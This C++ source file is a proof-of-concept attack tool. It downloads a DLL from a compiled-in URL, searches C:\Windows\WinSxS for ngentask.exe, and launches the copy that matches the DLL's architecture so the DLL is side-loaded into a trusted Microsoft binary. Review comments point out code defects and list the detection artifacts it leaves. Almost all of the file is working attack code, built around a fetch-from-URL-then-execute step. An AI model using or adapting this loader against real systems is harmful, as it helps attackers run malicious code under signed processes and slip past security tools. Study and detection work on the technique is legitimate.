#include "winsos.h"
// URL the DLL is fetched from; the placeholder name signals it is meant to be edited before a build.
// NOTE(review): initializing a non-const PWCHAR (wchar_t*) from a wide string literal drops the
// literal's const and is ill-formed in ISO C++; MSVC accepts it only without /Zc:strictStrings.
// PCWSTR would be the correct type if DownloadFile accepts a const pointer — confirm in winsos.h.
constexpr PWCHAR YOUR_URL_HERE = L"http://127.0.0.1:8080/target.dll";
// Entry point of the PoC. Sequence, as written: download a DLL into the current directory,
// enumerate candidate paths under C:\Windows\WinSxS, determine the DLL's bitness, then launch
// the first candidate whose path matches that bitness so the DLL is picked up by side-loading.
// Every helper (DisplayHeader, DownloadFile, SearchFileRecursive, GetDllCurrentFolder,
// Is64BitLibrary, ExecuteNgenTask) and the DLL_NAME constant come from winsos.h, which is not
// visible here; their exact contracts are assumed below and marked as such.
// argc/argv are accepted but never read — the URL is compiled in via YOUR_URL_HERE.
// Returns EXIT_FAILURE when any step fails, EXIT_SUCCESS otherwise.
// From a detection standpoint the observable artifacts are the HTTP fetch of target.dll into the
// working directory, a recursive enumeration of WinSxS, and a WinSxS-resident ngentask.exe being
// started by this process as its parent.
int main(int argc, char *argv[])
{
DisplayHeader();
printf("[+] Downloading DLL...\n");
// Step 1: fetch the DLL. DownloadFile is assumed to return false on any failure — confirm in winsos.h.
if (!DownloadFile(YOUR_URL_HERE, DLL_NAME))
{
printf("[x] Failed to download the DLL. Please check if the URL is valid\n");
return EXIT_FAILURE;
}
else
{
printf("\t[-] DLL saved successfully in the current directory\n");
}
printf("[+] Searching for ngentask binary in the WinSxS directory...\n");
// Step 2: collect candidate executables. The target filename is not passed here, so the
// filter for ngentask.exe presumably lives inside SearchFileRecursive — verify against winsos.h.
std::vector<std::wstring> pathList;
SearchFileRecursive(L"C:\\Windows\\WinSxS", pathList);
if (pathList.empty())
{
printf("[x] Failed to locate the ngentask.exe binary in the WinSxS directory\n");
return EXIT_FAILURE;
}
else
{
for (auto &path : pathList)
{
wprintf(L"\t[-] Found ngentask.exe at %s\n", path.c_str());
}
}
// Left uninitialized on purpose by the author; it is only read after Is64BitLibrary returned true,
// which is assumed to always write it on that path — confirm in winsos.h.
bool is64BitLibrary;
// GetDllCurrentFolder() is assumed to return the directory DownloadFile wrote into (no trailing
// backslash, since one is appended here) — confirm in winsos.h.
std::wstring fullDllPath = GetDllCurrentFolder() + L"\\" + DLL_NAME;
printf("[+] Checking the architecture of the DLL...\n");
// Step 3: read the PE bitness so a matching WinSxS flavour (amd64 vs x86) can be chosen below.
if (!Is64BitLibrary(fullDllPath.c_str(), is64BitLibrary))
{
printf("[x] Unable to identify the architecture of the library. Is it a valid PE file?\n");
return EXIT_FAILURE;
}
else
{
if (is64BitLibrary)
{
printf("\t[-] The DLL is a 64-bit PE file\n");
}
else
{
printf("\t[-] The DLL is a 32-bit PE file\n");
}
}
printf("[+] Ready to execute ngentask.exe\n");
// Step 4: launch the first candidate whose path contains the architecture token; only one
// candidate is ever executed because of the break.
// NOTE(review): if no path contains "amd64" (64-bit case) or "x86" (32-bit case) this loop runs
// to completion without calling ExecuteNgenTask, and the success message below is still printed.
// ExecuteNgenTask's return value (if it has one) is also discarded, so a failed launch is reported
// as success. A found/launched flag checked before the final printf would make the output truthful.
for (auto &path : pathList)
{
if (is64BitLibrary)
{
if (path.find(L"amd64") != std::wstring::npos)
{
ExecuteNgenTask(path.c_str());
break;
}
}
else
{
if (path.find(L"x86") != std::wstring::npos)
{
ExecuteNgenTask(path.c_str());
break;
}
}
}
// Printed unconditionally once the loop ends — see the note above the loop.
printf("[+] The DLL has been injected into ngentask.exe via DLL Side-Loading\n");
return EXIT_SUCCESS;
}